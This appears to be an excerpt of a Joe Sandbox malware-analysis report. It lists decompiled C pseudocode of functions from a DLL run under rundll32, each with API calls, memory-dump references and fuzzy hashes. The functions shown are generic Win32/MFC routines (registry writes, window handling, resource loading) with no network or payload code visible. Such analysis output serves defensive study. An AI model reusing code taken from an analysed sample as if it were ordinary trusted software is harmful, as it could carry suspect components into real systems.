                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002B47F(void* __ecx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, char _a12) {
				intOrPtr _v8;
				char _v24;
				intOrPtr _t15;
				long _t22;
				void* _t31;
				void* _t32;

				_t15 =  *0x1004c470; // 0x1bfbe703
				_t31 = __ecx;
				_v8 = _t15;
				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					wsprintfA( &_v24, 0x1003cc28, _a12);
					_t19 = WritePrivateProfileStringA(_a4, _a8,  &_v24,  *(_t31 + 0x64));
				} else {
					_t32 = E10035959(__ecx, _a4);
					if(_t32 != 0) {
						_t22 = RegSetValueExA(_t32, _a8, 0, 4,  &_a12, 4);
						RegCloseKey(_t32);
						_t19 = 0 | _t22 == 0x00000000;
					}
				}
				return E100117AE(_t19, _v8);
			}









                                                                        0x1002b485
                                                                        0x1002b48b
                                                                        0x1002b491
                                                                        0x1002b494
                                                                        0x1002b4d8
                                                                        0x1002b4ee
                                                                        0x1002b496
                                                                        0x1002b49e
                                                                        0x1002b4a2
                                                                        0x1002b4b3
                                                                        0x1002b4bc
                                                                        0x1002b4c6
                                                                        0x1002b4c9
                                                                        0x1002b4a2
                                                                        0x1002b4fe

                                                                        APIs
                                                                        • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 1002B4B3
                                                                        • RegCloseKey.ADVAPI32(00000000,?,?), ref: 1002B4BC
                                                                        • wsprintfA.USER32 ref: 1002B4D8
                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B4EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                        • String ID:
                                                                        • API String ID: 1902064621-0
                                                                        • Opcode ID: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                        • Instruction ID: 9a6bc9ffc77bb201adb5d4a8a8e7071db867b7f7a5a0f8b8952f6efe61c2a51a
                                                                        • Opcode Fuzzy Hash: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                        • Instruction Fuzzy Hash: A001403250161AEFDB02EFA5CD45E9E3BB8FF44754F044415FA04EB152DB71DA118B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10031D85 Relevance: 6.0, APIs: 4, Instructions: 47fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10031D85(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				char _v268;
				int _v272;
				void* __ebp;
				intOrPtr _t14;
				int _t24;
				intOrPtr* _t30;
				void* _t33;

				_t14 =  *0x1004c470; // 0x1bfbe703
				_v8 = _t14;
				E100220EE(_t33, SetActiveWindow( *(__ecx + 0x1c)));
				_t24 = 0;
				_v272 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
				_t30 =  *((intOrPtr*)(E100373B5() + 4));
				if(_v272 > 0) {
					do {
						DragQueryFileA(_a4, _t24,  &_v268, 0x104);
						_t18 =  *((intOrPtr*)( *_t30 + 0x88))( &_v268);
						_t24 = _t24 + 1;
					} while (_t24 < _v272);
				}
				DragFinish(_a4);
				return E100117AE(_t18, _v8);
			}











                                                                        0x10031d8e
                                                                        0x10031d99
                                                                        0x10031da3
                                                                        0x10031dae
                                                                        0x10031db9
                                                                        0x10031dca
                                                                        0x10031dcd
                                                                        0x10031dcf
                                                                        0x10031ddf
                                                                        0x10031dec
                                                                        0x10031df2
                                                                        0x10031df3
                                                                        0x10031dcf
                                                                        0x10031dfe
                                                                        0x10031e10

                                                                        APIs
                                                                        • SetActiveWindow.USER32(?), ref: 10031D9C
                                                                        • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 10031DB7
                                                                        • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 10031DDF
                                                                        • DragFinish.SHELL32(?), ref: 10031DFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                        • String ID:
                                                                        • API String ID: 892977027-0
                                                                        • Opcode ID: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
                                                                        • Instruction ID: f3efa9f330312ec6ab61e1b0fbe20e019f1dfd30d235b1af0ecd9192f479495c
                                                                        • Opcode Fuzzy Hash: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
                                                                        • Instruction Fuzzy Hash: A2016975900228AFDB11DF64CC84DE97BB8EF49354F0081AAF5859B151CA70AE81CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100368F3 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100368F3(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t21;
				void* _t37;

				_t37 = __ecx;
				if(IsWindow( *(__ecx + 0x1c)) == 0) {
					 *(_t37 + 0xa8) = _a4;
					 *(_t37 + 0xac) = _a8;
					 *(_t37 + 0xa0) = _a12;
					_t21 = _a16;
					 *(_t37 + 0xa4) = _t21;
					return _t21;
				}
				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
			}





                                                                        0x100368f7
                                                                        0x10036904
                                                                        0x10036954
                                                                        0x1003695d
                                                                        0x10036966
                                                                        0x1003696c
                                                                        0x1003696f
                                                                        0x00000000
                                                                        0x1003696f
                                                                        0x10036925
                                                                        0x1003693f
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$InvalidateRectWindow
                                                                        • String ID:
                                                                        • API String ID: 3225880595-0
                                                                        • Opcode ID: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
                                                                        • Instruction ID: 4b04fdd573aa0d80c43ff6d8227c2b4f41099026dca325be7ad292e47659670a
                                                                        • Opcode Fuzzy Hash: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
                                                                        • Instruction Fuzzy Hash: 7E015E70200718AFE7218F19DC45FAABBF8EF45751F10842AFD95DA190D6B0F850DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10036FD8 Relevance: 6.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 37%
                                                                        			E10036FD8(short* _a4) {
				char* _v0;
				int _v8;
				char* _v16;
				int _t6;
				char* _t7;
				short* _t11;
				void* _t12;
				void* _t16;
				int _t17;

				_t11 = _a4;
				if(_t11 != 0) {
					__imp__#7(_t11, _t12, _t16);
					_t17 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t11, _t17, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_v16 = _t7;
					WideCharToMultiByte(0, 0, _t11, _t17, _t7, _v8, 0, 0);
					return _v16;
				}
				return 0;
			}












                                                                        0x10036fda
                                                                        0x10036fe3
                                                                        0x10036fec
                                                                        0x10036ffc
                                                                        0x10037002
                                                                        0x10037006
                                                                        0x1003700a
                                                                        0x10037016
                                                                        0x1003701f
                                                                        0x00000000
                                                                        0x10037026
                                                                        0x00000000

                                                                        APIs
                                                                        • SysStringLen.OLEAUT32(?), ref: 10036FEC
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,10039361,00000000), ref: 10037002
                                                                        • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1003700A
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,10039361,00000000), ref: 1003701F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Byte$CharMultiStringWide$Alloc
                                                                        • String ID:
                                                                        • API String ID: 3384502665-0
                                                                        • Opcode ID: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
                                                                        • Instruction ID: 594c1e5c48785cf97723a890a7a01ae096917330bd715e74928d8e18aa0a9d1e
                                                                        • Opcode Fuzzy Hash: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
                                                                        • Instruction Fuzzy Hash: 98F030721062387F92219B679C88CABBFDCFE8B2A5B014919F548C2101C2259901CBF1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10036B96 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10036B96(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				signed int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				E1002F372(__ecx, _t19, _a8);
				_t12 = E100202AB(__ecx);
				if((_t12 & 0x00000001) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0x110))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}










                                                                        0x10036b9d
                                                                        0x10036ba4
                                                                        0x10036ba7
                                                                        0x10036bae
                                                                        0x10036bb6
                                                                        0x10036bc2
                                                                        0x10036bca
                                                                        0x10036bdc
                                                                        0x10036bea
                                                                        0x10036bf8
                                                                        0x10036bfc
                                                                        0x00000000
                                                                        0x10036bff
                                                                        0x10036bca
                                                                        0x10036c03

                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • GetParent.USER32(?), ref: 10036BBB
                                                                        • IsZoomed.USER32(00000000), ref: 10036BC2
                                                                        • GetSystemMetrics.USER32 ref: 10036BEA
                                                                        • GetSystemMetrics.USER32 ref: 10036BF8
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsSystem$LongParentWindowZoomed
                                                                        • String ID:
                                                                        • API String ID: 3909876373-0
                                                                        • Opcode ID: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
                                                                        • Instruction ID: 7d4475de74911b0f59ada56c103e3f3b6aae8d9b3b29eeb5a8f877c48aa9be1b
                                                                        • Opcode Fuzzy Hash: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
                                                                        • Instruction Fuzzy Hash: 3801A736A00214AFDB11ABB9DC49F59BBA8EF44740F018119FA45EB191D670B904CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000BFC5 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 54%
                                                                        			E1000BFC5(intOrPtr _a4, RECT* _a8, int _a12) {
				struct tagRECT _v20;
				intOrPtr _t28;

				_t28 = _a4;
				if(_a8 != 0) {
					IntersectRect( &_v20, _a8, _t28 - 0x9c);
					EqualRect( &_v20, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v20) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t28 - 0xac)) + 0x1c)) + 0x1c),  &_v20, _a12);
				}
				return 0;
			}





                                                                        0x1000bfd0
                                                                        0x1000bfd3
                                                                        0x1000bff6
                                                                        0x1000c003
                                                                        0x1000bfd5
                                                                        0x1000bfe0
                                                                        0x1000bfe1
                                                                        0x1000bfe2
                                                                        0x1000bfe3
                                                                        0x1000bfe5
                                                                        0x1000c015
                                                                        0x1000c02a
                                                                        0x1000c02a
                                                                        0x1000c034

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                        • String ID:
                                                                        • API String ID: 3354205298-0
                                                                        • Opcode ID: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
                                                                        • Instruction ID: 1e794ae20577572ca79bd181089135021f598cd57710f0e7593056f93d140995
                                                                        • Opcode Fuzzy Hash: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
                                                                        • Instruction Fuzzy Hash: 1601E57290022EEFEF01DFA5CC88EAAB7ADFB09254F018865E914DB115D231E5198B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100214B2 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100214B2(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10029A8E(_a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						return 1;
					}
				}
			}







                                                                        0x100214bc
                                                                        0x10021521
                                                                        0x00000000
                                                                        0x100214c4
                                                                        0x100214c4
                                                                        0x100214ca
                                                                        0x00000000
                                                                        0x100214e7
                                                                        0x100214f0
                                                                        0x100214fc
                                                                        0x10021502
                                                                        0x10021508
                                                                        0x1002150c
                                                                        0x1002150c
                                                                        0x10021516
                                                                        0x00000000
                                                                        0x1002151e
                                                                        0x100214ca

                                                                        APIs
                                                                        • GetObjectA.GDI32(00000000,0000000C,?), ref: 100214F0
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 100214FC
                                                                        • GetSysColor.USER32(00000008), ref: 1002150C
                                                                        • SetTextColor.GDI32(00000000,?), ref: 10021516
                                                                          • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Color$LongObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2871169696-0
                                                                        • Opcode ID: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                        • Instruction ID: 07a055e2fde14eb44e4b892d4051d3cd351fecf6f4b2367e44398545aae672e6
                                                                        • Opcode Fuzzy Hash: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                        • Instruction Fuzzy Hash: 0301283A900529EBEB429FA0EC85AEB3BA4EB55291F908560FD13C40A1C730CD90DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002415A Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002415A(void* __ecx, CHAR* _a4) {
				void* __edi;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				struct HINSTANCE__* _t16;
				void* _t17;

				_t14 = 0;
				_t11 = 0;
				_t17 = __ecx;
				if(_a4 == 0) {
					L4:
					_t15 = E100232BF(_t17, _t14, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t15;
				}
				_t16 =  *(E100373B5() + 0xc);
				_t8 = FindResourceA(_t16, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t16, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}











                                                                        0x1002415e
                                                                        0x10024160
                                                                        0x10024166
                                                                        0x10024168
                                                                        0x1002419d
                                                                        0x100241a7
                                                                        0x100241a9
                                                                        0x100241b0
                                                                        0x100241b0
                                                                        0x00000000
                                                                        0x100241b6
                                                                        0x1002416f
                                                                        0x1002417c
                                                                        0x10024184
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10024188
                                                                        0x1002418e
                                                                        0x10024192
                                                                        0x1002419b
                                                                        0x00000000
                                                                        0x1002419b
                                                                        0x100241bc

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,000000F0), ref: 1002417C
                                                                        • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 10024188
                                                                        • LockResource.KERNEL32(00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 10024195
                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 100241B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLock
                                                                        • String ID:
                                                                        • API String ID: 1078018258-0
                                                                        • Opcode ID: 1bfed9c45fcc7c4252f354aa1b7bd718f75082ca3ca7a644671ccf1c6bb2871f
                                                                        • Instruction ID: fdd0e0ea882c3c69c4099ed456d0cfd7dce8bbf4e7d741b6fad66cb09ea4bd77
                                                                        • Opcode Fuzzy Hash: 1bfed9c45fcc7c4252f354aa1b7bd718f75082ca3ca7a644671ccf1c6bb2871f
                                                                        • Instruction Fuzzy Hash: 40F0903A2412256FD3029FA65C88D3FB6FDEFB59E6B424038FD05D6212DE209C5587A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002095F Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E1002095F(void* __ecx) {
				int _t26;
				int _t28;
				void* _t41;

				E10011BF0(0x1003a4d8, _t41);
				_push(__ecx);
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					 *(_t41 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					_push(_t41 - 0x10);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x4c)))) + 0x8c))();
					lstrcpynA( *(_t41 + 8),  *(_t41 - 0x10),  *(_t41 + 0xc));
					_t26 = lstrlenA( *(_t41 + 8));
					E100014B0( &(( *(_t41 - 0x10))[0xfffffffffffffff0]), _t41 - 0x10);
					_t28 = _t26;
				} else {
					_t28 = GetWindowTextA( *(__ecx + 0x1c),  *(_t41 + 8),  *(_t41 + 0xc));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t28;
			}






                                                                        0x10020964
                                                                        0x10020969
                                                                        0x10020971
                                                                        0x10020993
                                                                        0x1002099b
                                                                        0x100209a2
                                                                        0x100209a3
                                                                        0x100209b2
                                                                        0x100209bb
                                                                        0x100209c9
                                                                        0x100209ce
                                                                        0x10020973
                                                                        0x1002097c
                                                                        0x1002097c
                                                                        0x100209d4
                                                                        0x100209dc

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10020964
                                                                        • GetWindowTextA.USER32 ref: 1002097C
                                                                        • lstrcpynA.KERNEL32(?,?,?,?,?,1002CC3A,?,00000104,?), ref: 100209B2
                                                                        • lstrlenA.KERNEL32(?,?,?,1002CC3A,?,00000104,?), ref: 100209BB
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: H_prologTextWindowlstrcpynlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3022380644-0
                                                                        • Opcode ID: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                        • Instruction ID: 9a5806592f70ea17751b7fdaa6094fb832eb62a9ddc39452fd7da2019fb28030
                                                                        • Opcode Fuzzy Hash: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                        • Instruction Fuzzy Hash: 75019E36900129EFDB05DFA4CC48BAEBBB2FF48314F00C619F512AB262CB719950DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001B66F Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1001B66F(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				void* _t12;
				void* _t18;
				intOrPtr* _t20;
				void* _t21;
				void* _t22;

				_t20 = _a4;
				_t19 = _a8;
				_t12 = E1001B64E( *_t20,  *_a8, _t20);
				_t22 = _t21 + 0xc;
				if(_t12 != 0) {
					_t3 = _t20 + 4; // 0x4
					_t18 = E1001B64E( *_t3, 1, _t3);
					_t22 = _t22 + 0xc;
					if(_t18 != 0) {
						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
					}
				}
				_t6 = _t20 + 4; // 0x4
				if(E1001B64E( *_t6,  *((intOrPtr*)(_t19 + 4)), _t6) != 0) {
					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
				}
				_t10 = _t20 + 8; // 0x8
				return E1001B64E( *_t10,  *((intOrPtr*)(_t19 + 8)), _t10);
			}








                                                                        0x1001b670
                                                                        0x1001b675
                                                                        0x1001b67e
                                                                        0x1001b683
                                                                        0x1001b688
                                                                        0x1001b68a
                                                                        0x1001b692
                                                                        0x1001b697
                                                                        0x1001b69c
                                                                        0x1001b69e
                                                                        0x1001b69e
                                                                        0x1001b69c
                                                                        0x1001b6a1
                                                                        0x1001b6b4
                                                                        0x1001b6b6
                                                                        0x1001b6b6
                                                                        0x1001b6b9
                                                                        0x1001b6cc

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
